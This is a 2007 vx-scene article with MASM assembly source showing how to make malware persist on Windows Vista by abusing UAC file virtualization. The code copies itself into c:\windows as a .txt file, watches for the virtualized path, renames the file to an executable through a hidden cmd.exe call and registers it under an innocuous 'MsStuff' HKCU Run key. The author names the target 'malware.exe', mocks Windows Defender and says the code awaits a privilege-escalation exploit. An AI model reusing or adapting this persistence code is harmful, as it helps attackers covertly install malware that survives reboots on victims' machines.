Vista Surviving the restart [tha N00b Way] Author:FakedMinded/EOF-Project|| >Introduction Since most processes will run in userland mode by default under vista ,MS didnt want to vandalize Authentic processes from running correctly,so they established virtualization trick to let processes store information they need virtually. In this article I am trying to get use of virtualization to setup a startup runner exeutable. >>Problems and Solutions The first probem is that when to copy a file Using CopyFile() the executable extension (.exe,.com,.bat) is not allowed to be copied to the virtual folder. The second problem is that we dont know if the user ran our process in admintrator level by right clicking on the our executable file and choosing the admin run. Now going for the solution: For the first one ,using "cmd /c rename file.txt malware.exe" will solve the extension thing.Yeah !! renaming uing cmd.exe . For the second problem we will use vista directory monitoring weakness ReadDirectoryChangesW() to watch if our executable will go to virtualized directory or not. >>Accessing Registry Dont try to access registry HKEY_LOCAL_MACHINE for two aspects I will discuss here first is that if you are in userland it will be redirected to somewhere in Reg other than your request and second there will be a tray icon bitching about blocked program from running so they are stopped by WindowsDefender shit :) >Code Here I will mainly put a code I did on the fly(you can do better than this!!) One more Hint,ReadDirectryChangesW() monitor other threads Dir acces other than the one it run in so CopyFile() will be on a seprate thread . ;------------------CODE .586 .model flat,stdcall option casemap:none include \masm32\include\ include \masm32\include\ include \masm32\include\ include \masm32\include\ includelib \masm32\lib\kernel32.lib includelib \masm32\lib\user32.lib includelib \masm32\lib\advapi32.lib .data r00t db "c:\",0 dest_ db "c:\windows\f0cQ.txt",0 r00t_path db "c:\windows\f0cQ.exe",0 run_path db "Software\Microsoft\Windows\CurrentVersion\Run\",0 key_run db "MsStuff",0 cmd db 'cmd.exe /c rename c:\',0 cmd_ext db ' f0cQ.exe',0 .data? buffer db 1024 dup(?) buf_msg db 512 dup(?) hDir dd ? bwr dd ? counter dd ? reg_h dd ? tid dd ? .code ;-----------------------------------------------------\ uni2str: ; Functions to convert uni to aci xor edx,edx xor ebx,ebx @@: mov dl,byte ptr [esi] mov byte ptr [edi],dl inc edi add esi,2 loop @b ret size_uni:;---------------------------------------|Size the unicode string xor ecx,ecx @@: add ecx,2 cmp word ptr [esi],0 jz @f add esi,2 jmp @b @@: ret ;----------------------------------------------------/End of my functions ;) lack_ proc ;the seperate thread for CopyFile() LOCAL mem:DWORD invoke Sleep,1000 invoke GlobalAlloc,0,1512 mov mem,eax invoke GetModuleFileName,0,mem,512 @@: invoke CopyFile,mem,offset dest_,FALSE invoke Sleep,1000 jmp @b ret lack_ endp start: invoke CreateThread,0,0,offset lack_,0,0,offset tid invoke CreateFile,offset r00t ,FILE_LIST_DIRECTORY,FILE_SHARE_DELETE or FILE_SHARE_READ,0,\ ;be careful with OPEN_EXISTING,FILE_FLAG_BACKUP_SEMANTICS,0 ;the parameters cmp eax,INVALID_HANDLE_VALUE je exit mov hDir,eax @1: invoke RtlZeroMemory,offset buf_msg,512 invoke ReadDirectoryChangesW,hDir,offset buffer,1024,1,17fh,offset bwr,0,0 ;17fh meas all the Notification :p or eax,eax jz exit mov eax,offset buffer @@: push eax lea esi,[eax].FILE_NOTIFY_INFORMATION.FileName push esi call size_uni pop esi lea edi,offset buf_msg call uni2str invoke lstrlen,offset buf_msg add eax,offset buf_msg sub eax,8 cmp word ptr[eax],"Qc0f" ;see if out exe got caught on our radar jne @f lea eax,buf_msg cmp word ptr [eax],"resU" ;is it UserLand jz found_virtualization @@: inc counter cmp counter,100 je no_virtualization pop eax cmp [eax].FILE_NOTIFY_INFORMATION.NextEntryOffset,0 jz start add eax,[eax].FILE_NOTIFY_INFORMATION.NextEntryOffset push eax jmp @b found_virtualization: ;found virtualization invoke GetExitCodeThread,tid,offset bwr invoke TerminateThread,tid,bwr invoke RtlZeroMemory,offset buffer,1024 invoke lstrcat,offset buffer,offset cmd invoke lstrcat,offset buffer,offset buf_msg invoke lstrcat,offset buffer,offset cmd_ext invoke MessageBox,0,offset buffer,0,0 invoke WinExec,offset buffer,SW_HIDE invoke RtlZeroMemory,offset buffer,1024 push 0 push "\:c" mov edx,esp invoke lstrcat,offset buffer,edx invoke lstrlen,offset buf_msg add eax,offset buf_msg sub eax,4 mov dword ptr[eax],0 invoke lstrcat,offset buffer,offset buf_msg push 0 push "exe." mov ecx,esp invoke lstrcat,offset buffer,ecx invoke MessageBox,0,offset buffer,0,0 invoke RegOpenKeyEx,HKEY_CURRENT_USER,offset run_path,0,KEY_ALL_ACCESS,offset reg_h invoke lstrlen,offset buffer invoke RegSetValueEx,reg_h,offset key_run,0,REG_SZ,offset buffer,eax invoke RegCloseKey,reg_h invoke DeleteFile,offset dest_ invoke MessageBox,0,offset buffer,offset r00t,0 jmp exit no_virtualization: ;///here we take the risk that the uer might stopped virtualization from our application invoke GetExitCodeThread,tid,offset bwr invoke TerminateThread,tid,bwr call @f db 'cmd /c rename "c:\windows\f0cQ.txt" f0cQ.exe',0 @@: pop edx invoke WinExec,edx,SW_HIDE invoke RegOpenKeyEx,HKEY_CURRENT_USER,offset run_path,0,KEY_ALL_ACCESS,offset reg_h invoke RegSetValueEx,reg_h,offset key_run,0,REG_SZ,offset r00t_path,sizeof r00t_path-1 invoke RegCloseKey,reg_h invoke DeleteFile,offset dest_ invoke MessageBox,0,offset buf_msg,0,0 exit: invoke ExitProcess,0 end start ;------------------End OF CODE >Final W0rds I hope you njoied the above ,For me I cant wait for a real working escaltion privilege vuln in vista to drop the above shit . oh..yeah Greetings to the eof-project members,and the whole vx-scene fakedminded/berniee CopyRites- 2007